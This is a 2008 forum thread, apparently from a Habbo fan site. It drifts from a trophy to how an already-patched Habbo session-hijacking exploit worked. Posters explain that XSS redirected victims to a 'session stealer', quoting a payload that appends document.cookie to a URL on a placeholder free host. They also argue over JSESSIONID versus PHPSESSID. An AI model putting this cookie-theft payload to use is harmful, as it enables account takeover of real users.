Blue sleeping bags given to X's

InfoStructure · 21-07-2008, 11:28 AM

Originally Posted by leahhh

They got a throphy aswell !

i dont remember anyone saying about a trophy...

leahhh · 21-07-2008, 11:53 AM

Originally Posted by InfoStructure

i dont remember anyone saying about a trophy...

Jxhn · 21-07-2008, 03:21 PM

Originally Posted by Kent

It was with the Javascript session Id given to each user when they sign/log in. You direct a person to a website and it sends you their javascript session id allowing you to use it on habbo and yours their ID for you to sign into their account. It only worked if the habbo had been logged in for 20 minutes or less or it would time-out (expire).
If they expired you can edit homepage, post comments etc.

For your other question, you can no longer exploit it due to the ID being hidden. It wasn't a fake login, if you directed someone to the site it automatically gave you an ID, they couldn't prevent it.

I thought the reason it was patched was because there aren't any more XSS exploits on habbo.co.uk to redirect the person to a session stealer (it only works if the user is redirected to http://name.freehost.com/folder/stealer.php?cookie= + document.cookie straight from habbo.co.uk).

Also isn't is a php session id rather that a javascript session id? Hence 'PHPSESSID=blahblah'.

Kent · 21-07-2008, 06:35 PM

Originally Posted by Unhappyness

I thought the reason it was patched was because there aren't any more XSS exploits on habbo.co.uk to redirect the person to a session stealer (it only works if the user is redirected to http://name.freehost.com/folder/stealer.php?cookie= + document.cookie straight from habbo.co.uk).

Also isn't is a php session id rather that a javascript session id? Hence 'PHPSESSID=blahblah'.

No it's 'JSESSIONID='